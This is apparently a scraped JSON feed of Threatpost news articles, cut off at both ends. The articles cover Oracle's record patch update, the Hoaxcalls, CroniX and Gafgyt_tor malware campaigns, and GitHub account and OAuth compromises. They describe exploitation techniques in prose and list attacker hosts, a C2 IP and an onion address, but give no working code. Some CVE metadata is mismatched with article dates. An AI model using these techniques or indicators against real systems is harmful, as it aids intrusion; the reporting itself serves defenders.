patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-28T21:22:54", "description": "The Hoaxcalls botnet, built to carry out large-scale distributed denial-of-service (DDoS) attacks, has been actively in development since the beginning of the year. One of its hallmarks is that it uses different vulnerability exploits for initial compromise.\n\nResearchers, however, have discovered that it\u2019s been a hit-or-miss journey for its operators when it comes to the bugs they choose \u2013 while at the same time, they\u2019ve had to reboot after takedowns.\n\n\u201cThe Hoaxcalls campaign has provided researchers with a number of opportunities over the last several months to explore the trials and errors in researching, developing and building a botnet campaign and the abandoned infrastructure that are left behind,\u201d explained Daniel Smith, researcher with Radware, in a [Thursday posting](<https://blog.radware.com/security/botnets/2020/05/ghosting-bots-the-story-of-hoaxcalls-failures/>). \u201cLike derelict satellites that orbit the earth, these bots skim and crawl vulnerable internet devices without a real objective.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe Hoaxcalls operators are among those botherders that differentiate themselves from amateur actors with the use of exploits \u2013 most of those with fewer technical skills tend to brute-force SSH and Telnet credentials in order to compromise devices and add them to their botnets.\n\nHowever, that strategy has its downsides, Smith noted.\n\n\u201cBotherders also have to compete with each other for their share of vulnerable resources,\u201d he wrote. \u201cIf there are only 400 vulnerable devices for a given exploit, it\u2019s first-come, first-serve. Those that leverage recent or undisclosed exploits stand a better chance of infecting more devices than those that do not.\u201d\n\n## **A History of Exploits**\n\nHoaxcalls first emerged in late March, as a variant of the Gafgyt/Bashlite family; it\u2019s named after the domain used to host its malware, Hoaxcalls.pw. The original version was seen infecting devices through two vulnerabilities, according to Palo Alto Networks: A DrayTek Vigor2960 remote code-execution (RCE) vulnerability and a GrandStream Unified Communications remote SQL injection bug (CVE-2020-5722).\n\nTwo new Hoaxcalls samples spotted by Radware showed up on the scene in April, incorporating new commands from its command-and-control (C2) server and [a new exploit](<https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/>) for an unpatched vulnerability impacting the ZyXEL Cloud CNM SecuManager that was disclosed in March.\n\n\u201cThe operators have also seemed to be favoring the Netlink GPON Router 1.0.11 RCE [in the last 90 days],\u201d Smith said.\n\nTo date, the group has incorporated 12 different exploits since March, according to Smith.\n\n\u201cThis process is a bit like trial-and-error, and while the number seems impressive, not every attempt was a successful or fruitful one,\u201d he said. \u201cThe game of testing exploits for the purpose of propagating botnets is a fast pace, full contact sport. Those that cannot develop or discover their own exploits must rely on public disclosures. Once a proof-of-concept (PoC) is posted, the race is on to become the first to actively leverage the exploit.\u201d\n\n## **Hoaxcalls Failures**\n\nSome of the exploits that the Hoaxcalls group tried but abandoned include the bugs tracked as CVE-2018-10562 and CVE-2018-10561, which are authentication-bypass and command-injection bugs for GPON home routers. Smith\u2019s analysis showed that the cyberattackers used it only a handful of times over the last 90 days.\n\n\u201cThe group likely abandoned this exploit for propagation because of its popularity with other, competing bot herders,\u201d explained Smith. \u201cThe CVEs for the GPON authentication bypass and command injection were posted back in May 2018. Because this exploit is widely known, it is over-saturated with botherders looking to capture or hijack what remains of devices are left on the internet.\u201d\n\nAnother example of a Hoaxcalls failed exploit is a post-authentication remote code-execution (RCE) bug in the Symantec Web Gateway version 5.0.2.8. In May, researchers at Palo Alto Networks\u2019 Unit 42 division observed the latest version of the botnet [exploiting this unpatched bug](<https://threatpost.com/hoaxcalls-botnet-symantec-secure-web-gateways/155806/>), which exists in a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019.\n\nHowever, Smith speculated that the operators decided its use wasn\u2019t panning out \u2013 likely because of its exploitation difficulty level rather than over-saturation.\n\n\u201cFrom my perspective, Hoaxcalls is really the only campaign attempting to use this exploit,\u201d Smith wrote. \u201cThis vulnerability likely saw limited success by the operators due to the post-authentication nature of the Symantec Secure Web Gateway RCE.\u201d\n\nIn general, exploits do not guarantee additional devices.\n\n\u201cThey can fail for one reason of another,\u201d Smith said. \u201cSome of these reasons include the threat actor\u2019s inability to properly leverage an exploit, a limited number of devices to target or oversaturation due to competition.\u201d\n\n## **Abandoned Infrastructure**\n\nMeanwhile, the Hoaxcalls operators have lost several servers to take-down requests.\n\n\u201cTypically, when the malware host is taken down, the scanners have nothing left to load once they have discovered and compromised a vulnerable device,\u201d explained Smith. \u201cIn the event the C2 infrastructure is taken down, the bots will have nothing left to communicate with.\u201d\n\nThis typically leaves botherders in the position of having to build a new botnet from scratch.\n\nIn April, a Hoaxcalls malware host (19ce033f.ngrok[dot]io was taken down, leaving infected devices to continue to scan the internet for more devices to compromise, while the threat actors simply resumed operations on another server with IP 178.32.148.5.\n\nThis proliferated: On April 7, there were 183 IP addresses attempting to distribute Hoaxcalls payloads, compared to a total of 340 IPs at the end of May, according to Radware telemetry. The number of devices scanning has finally started to taper off, Smith said, probably because customers have rebooted the devices, crippling the malware, or the devices being re-infected and \u201cre-owned\u201d by a competing botherder.\n\nOverall, \u201cwhile the threat actors have had a good run so far, developing many variants and leveraging numerous exploits, they have experienced some degree of failure,\u201d Smith said. \u201cChalk it up to trial and error.\u201d\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-28T21:10:01", "type": "threatpost", "title": "Inside the Hoaxcalls Botnet: Both Success and Failure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562", "CVE-2020-5722"], "modified": "2020-05-28T21:10:01", "id": "THREATPOST:73B0A9668B2D256140F8DDF19E2E6238", "href": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-05T16:44:35", "description": "Researchers have discovered what they say is the first variant of the Gafgyt botnet family to cloak its activity using the Tor network.\n\nGafgyt, a [botnet that was uncovered in 2014](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>), has become infamous for launching large-scale distributed denial-of-service (DDoS) attacks. Researchers first discovered activity from the newest variant, which they call Gafgyt_tor, on Feb. 15.\n\nIn order to evade detection, Gafgyt_tor uses Tor to hide its command-and-control (C2) communications, and encrypts sensitive strings in the samples. The use of [Tor by malware families is nothing new;](<https://threatpost.com/chewbacca-latest-malware-to-take-a-liking-to-tor/103220/>) however, researchers said they haven\u2019t seen Gafgyt leveraging the anonymity network until now.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCompared with other Gafgyt variants, the biggest change of Gafgyt_tor is that the C2 communication is based on Tor, which increases the difficulty of detection and blocking,\u201d said researchers with NetLab 360 [on Thursday](<https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/>). \u201cThe Tor-based C2 communication mechanism has been seen in other families we have analyzed before\u2026 but this is the first time we encountered it in the Gafgyt family.\u201d\n\n## **Gafgyt_tor Botnet: Propagation and New Functionalities**\n\nThe botnet is mainly propagated through weak Telnet passwords \u2013 a common issue on [internet of things devices](<https://threatpost.com/hacker-leaks-more-than-500k-telnet-credentials-for-iot-devices/152015/>) \u2013 and through exploiting three vulnerabilities. These vulnerabilities include a remote code execution flaw (CVE-2019-16920) [in D-Link devices](<https://threatpost.com/d-link-routers-zero-day-flaws/162064/>); a remote code execution vulnerability in Liferay enterprise portal software (for which no CVE is available); and a flaw (CVE-2019-19781) in Citrix Application Delivery Controller.\n\nResearchers said that the code structure of Gafgyt_tor\u2019s main function \u2013 which adds the Tor proxy function to provide the IP server\u2019s address \u2013 shows widespread changes.\n\n\u201cThe original initConnection() function, which is responsible for establishing the C2 connection, is gone, replaced by a large section of code responsible for establishing the Tor connection,\u201d they said.\n\n## **New Tor Capabilities, Commands**\n\nWithin this large section of code exists tor_socket_init, a function that is responsible for initializing a list of proxy nodes with IP addresses and a port. Researchers said that over 100 Tor proxies can be built in in this way \u2013 and new samples are continually updating the proxy list.\n\n[![Gafgyt Tor Botnet ](https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/05101946/ver1_ver2_cmp_cfg.en_-300x237.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/05101946/ver1_ver2_cmp_cfg.en_.png>)\n\nThe new versus old code structure for the Gafgyt variant. Credit: NetLab 360\n\n\u201cAfter initializing the proxy list, the sample will select a random node from the list to enable Tor communication via tor_retrieve_addr and tor_retrieve_port,\u201d said researchers.\n\nAfter it establishes a connection with the C2, the botnet requests wvp3te7pkfczmnnl.onion through the darknet, from which it then awaits commands.\n\n\u201cThe core function of Gafgyt_tor is still DDoS attacks and scanning, so it mostly follows the common Gafgyt directive,\u201d said researchers. They noted, a new directive called LDSERVER has been added to the botnet, which allows the C2 to quickly specify servers from which the payloads are downloaded. This allows attackers to quickly switch courses should an attacker-owned download server be identified and blocked, said researchers.\n\n\u201cThis directive means that C2 can dynamically switch download servers, so that it can quickly switch to a new download server to continue propagation if the current one is blocked,\u201d said researchers,\n\n## **Links to Freak Threat Actor, Other Botnets**\n\nResearchers said that the variant shares the same origin with the Gafgyt samples distributed by a threat group that NetLab 360 researchers call the keksec group, and that other researchers [call the Freak threat actor](<https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/>). They said, the keksec group reuses code and IP addresses between various other bot families, including the Tsunami botnet as well as the Necro botnet family uncovered in January.\n\n\u201cWe think that Gafgyt_tor and Necro are very likely operated by the same group of people, who have a pool of IP addresses and multiple botnet source codes, and have the ability of continuous development,\u201d said researchers. \u201cIn actual operation, they form different families of botnets, but reuse infrastructure such as IP address.\u201d\n\n## **Other Gafgyt Botnet Variants**\n\nGafgyt.tor is only the latest variant of the popular botnet to come to light. In 2019, researchers warned of a [new Gafgyt variant adding vulnerable IoT devices](<https://threatpost.com/valve-source-engine-fortnite-servers-crippled-by-gafgyt-variant/149719/>) to its botnet arsenal and using them to cripple gaming servers worldwide.\n\nIn 2018, researchers said they discovered new variants for the Mirai and [Gafgyt IoT botnets ](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>)targeting well-known vulnerabilities in Apache Struts and SonicWall; as well as a separate attack actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nMore recently, last year a botnet called [Hoaxcalls emerged](<https://threatpost.com/hoaxcalls-botnet-symantec-secure-web-gateways/155806/>), as a variant of the Gafgyt family. The botnet, which can be marshalled for large-scale distributed denial-of-service (DDoS) campaigns, is spreading [via an unpatched vulnerability](<https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/>) impacting the ZyXEL Cloud CNM SecuManager.\n\n**_Check out our free _****_[upcoming live webinar events](<https://threatpost.com/category/webinars/>)_****_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_** \n\u00b7 March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)) \n\u00b7 April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-05T15:55:41", "type": "threatpost", "title": "D-Link, IoT Devices Under Attack By Tor-Based Gafgyt Variant", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562", "CVE-2019-16920", "CVE-2019-19781"], "modified": "2021-03-05T15:55:41", "id": "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "href": "https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:55:11", "description": "Github is forcing a password reset on some of its users after it detected a number of successful intrusions into its repositories using credentials compromised in other breaches.\n\n\u201cThis appears to be the result of an attacker using lists of email addresses and passwords from other online services that have been compromised in the past, and trying them on GitHub accounts,\u201d GitHub said in an [advisory](<https://github.com/blog/2190-github-security-update-reused-password-attack>) published Thursday by Shawn Davenport, GitHub VP of security. \u201cWe immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts.\u201d\n\nGitHub said it detected late Tuesday unauthorized attempts against a large number of GitHub accounts. It stressed that GitHub itself has not been compromised.\n\nIt warns users that in addition to the exposed credentials, some personal information may have been exposed as well as lists of accessible repositories and organizations.\n\n\u201cIf your account was impacted, we are in the process of contacting you directly with information about how to reset your password and restore access to your account,\u201d GitHub said.\n\nThe source of credentials used to attack GitHub accounts is unknown. ~~A request for comment from GitHub was not returned in time for publication~~ Github declined to comment beyond what is in its advisory.\n\nIn recent weeks, a number of massive online services including Twitter, VerticalScope, LinkedIn, Tumblr, VK.com and others have been informed that login credentials are for sale in bulk on the black market.\n\nAggregator site LeakedSource has been selling access to its database of breached credentials and more than 700 million credentials have been shared with the site.\n\n\u201cOur intentions are to bring data breaches to light no matter how old, inform consumers about what data is out there, inform consumers to use unique passwords and through our business API directly help companies determine if their users are at risk for account hijacking,\u201d LeakedSource told Threatpost.\n\n[VerticalScope](<http://www.verticalscope.com/about-us/security-update.html>), whose technology powers a number of popular online forums, is the most recent victim to come to light. More than 40 million credentials are believe to be implicated, stolen from sites running outdate vBulletin software that fails to implement HTTPS.\n\n\u201cWe believe that any potential breach is limited to usernames, userids, email addresses, ip addresses and encrypted passwords of our community users,\u201d VerticalScope said in its advisory.\n\nThe VerticalScope data was shared with LeakedSource, which analyzed it and said most of the passwords were salted using the outdated MD5 algorithm and easily crackable. LeakedSource published a top 10 list of the most common passwords and an unusual number of jibberish, complex passwords were included (18atcskd2w was used more on more than 91,000 accounts) indicating that they were likely generated by a bot and used to access the various forums.\n\nIn addition to VerticalScope, LeakedSource has analyzed tens of millions of credentials belonging to Twitter, iMesh and users of other large services whose credentials were stolen at some point.\n\nExperts, meanwhile, continue to caution against [password reuse](<https://threatpost.com/no-simple-fix-for-password-reuse/118536/>). As these breaches show, using the same password to access multiple sites is becoming fodder for attackers compromising one site to use that same access at other locations on the Internet.\n\n\u201cWe know that attackers will go for the weakest link and that is any user who reuses their passwords. It\u2019s a major problem,\u201d said Christopher Hadnagy, chief human hacker at security firm Social-Engineer.\n", "cvss3": {}, "published": "2016-06-17T11:01:55", "type": "threatpost", "title": "Breached Credentials Used to Access Github Repositories", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:36", "id": "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "href": "https://threatpost.com/breached-credentials-used-to-access-github-repositories/118746/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:23", "description": "A Russian security researcher was able to take five low severity OAuth bugs in the coding site Github and string them together to create what he calls a \u201csimple but high severity exploit\u201d that gave him unfettered access to users\u2019 private repositories.\n\nBangkok-based researcher Egor Homakov \u2013 inspired to poke around the site after learning about its [new bug bounty program last month](<http://threatpost.com/github-launches-bug-bounty-program/103974>) \u2013 discussed the bugs in a blog entry [on his site](<http://homakov.blogspot.com/2014/02/how-i-hacked-github-again.html?m=1>) on Friday.\n\nGithub went on to fix the vulnerabilities \u201cin a timely fashion\u201d according to Homakov, who said he received a $4,000 reward, the highest Github has rewarded in the bounty program\u2019s short time, for his work.\n\nThe main problem lies in the site\u2019s Gist OAuth functionality. [Gists](<https://gist.github.com/>) are Pastebin-like repositories on Github that allow coders to share bits and pieces of their work with their contemporaries, and OAuth is an authentication protocol that can allow different entities, be it a web app or a mobile app, varying degrees of access to your account.\n\nThe first vulnerability in Github Homakov noticed was that he could bypass its [redirect_uri](<https://developer.github.com/v3/oauth/#redirect-urls>) validation by imputing a /../ path traversal. A path traversal attack allows access files and directories stored outside the web root folder to be accessed by manipulating the URL. In this case when the browser is redirected, Homakov found that he can control the HTTP parameter and trick it into not fully parsing the URL, letting him redirect to any Gist page he wants.\n\nIn fact Homakov found that whatever the client sent to get an authorization token, the provider would respond with a valid access_token, a vulnerability that could be used to compromise the log-in functionality on any site that uses it.\n\nThis \u2013 the second bug \u2013 could make it easy for an attacker to hijack the authorization code used for the redirect_uri and simply apply the leaked code on real client\u2019s callback to log in under the victim\u2019s account.\n\nHomakov discovered he could leverage both bugs to trick a user into following a link to get Github to leak a code sending request to him. Using something he\u2019s nicknamed an [Evolution of Open Redirect vulnerability](<http://homakov.blogspot.com/2014/01/evolution-of-open-redirect-vulnerability.html>) the code sending request is sent to an image request which Homakov can then use to then log into the victim\u2019s account and secure access to private gists.\n\nGists are static pages and can even allow users to embed their own images, or at least image code. In this situation there\u2019s a certain way the code can point to a suspicious URL and acquire the victim\u2019s code.\n\nOnce in, Homakov found that the client reveals the victim\u2019s actual OAuth access_token to the user agent, something he then was able to take advantage of and use to perform API calls on behalf of the victim.\n\nSince Gist falls under the Github umbrella, Homakov found the client approves any scope it\u2019s asked automatically. That includes allowing it to carry out specially crafted URLs that can leak code, giving him access to private GitHub repositories and Gists, \u201call in stealth-mode,\u201d because the github_token belongs to the Gist client. From here Homakov has the control of the affected Github user and their Gist account.\n\nHomakov is no stranger to rooting out Github bugs; he blogged about a bug involving the way the site pushes [public keys](<http://homakov.blogspot.com/2012/03/how-to.html>) in March 2012 and a problem with the way the site [handles cookies](<http://homakov.blogspot.com/2013/03/hacking-github-with-webkit.html>) last March.\n\nGithub kicked off its bug bounty program just over a week ago by promising to award anywhere from $100 to $5,000 to researchers who discover vulnerabilities in the site or other applications like its API or Gist. As Homakov\u2019s vulnerability involved both Github and Gist and fetched $4,000, it was clearly of concern to the site, with the way the vulnerabilities \u201c[fit so nicely together](<https://twitter.com/homakov/status/431685133570031617>),\u201d impressing Github.\n", "cvss3": {}, "published": "2014-02-11T10:53:58", "type": "threatpost", "title": "Five OAuth Bugs Lead to Github Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-02-13T22:01:16", "id": "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "href": "https://threatpost.com/five-oauth-bugs-lead-to-github-hack/104178/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:51:35", "description": "Proof-of-concept code found on the GitHub repository could allow attackers to easily take advantage of a recently identified vulnerability in the Apache Struts 2 framework. The vulnerability 